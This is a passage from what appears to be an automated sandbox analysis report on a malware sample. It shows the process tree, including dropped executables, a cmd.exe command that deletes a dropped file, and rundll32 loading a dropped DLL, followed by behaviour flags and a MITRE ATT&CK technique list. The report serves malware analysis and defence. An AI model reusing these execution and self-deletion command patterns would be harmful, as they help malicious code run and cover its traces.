  - Suspicious use of AdjustPrivilegeToken
  PID:5792
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\Pictures\Adobe Films\bogAMCgr_ceyHDpTDqaFFCso.exe"
    3⤵
    PID:4724
- C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe
  "C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe"
  2⤵
  - Executes dropped EXE
  PID:2564

C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19325eb008c0b950.exe
Tue19325eb008c0b950.exe
1⤵
- Executes dropped EXE
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1952 -ip 1952
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4648 -ip 4648
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5728

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe a454731f9e1ab86af298c83b44bc0881 /wQZQ2ddR0eUW1NvDehkHw.0.1.0.3.0
1⤵
- Modifies data under HKEY_USERS
PID:5708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4828 -ip 4828
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5232 -ip 5232
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3552 -ip 3552
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5952

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2292
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 904 -ip 904
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 468 -ip 468
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3104 -ip 3104
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Checks processor information in registry
PID:4796
- C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  2⤵
  PID:2096
- C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  2⤵
  PID:5884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4896 -ip 4896
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2500

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe a454731f9e1ab86af298c83b44bc0881 /wQZQ2ddR0eUW1NvDehkHw.0.1.0.3.0
1⤵
- Modifies data under HKEY_USERS
PID:5236

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

System Information Discovery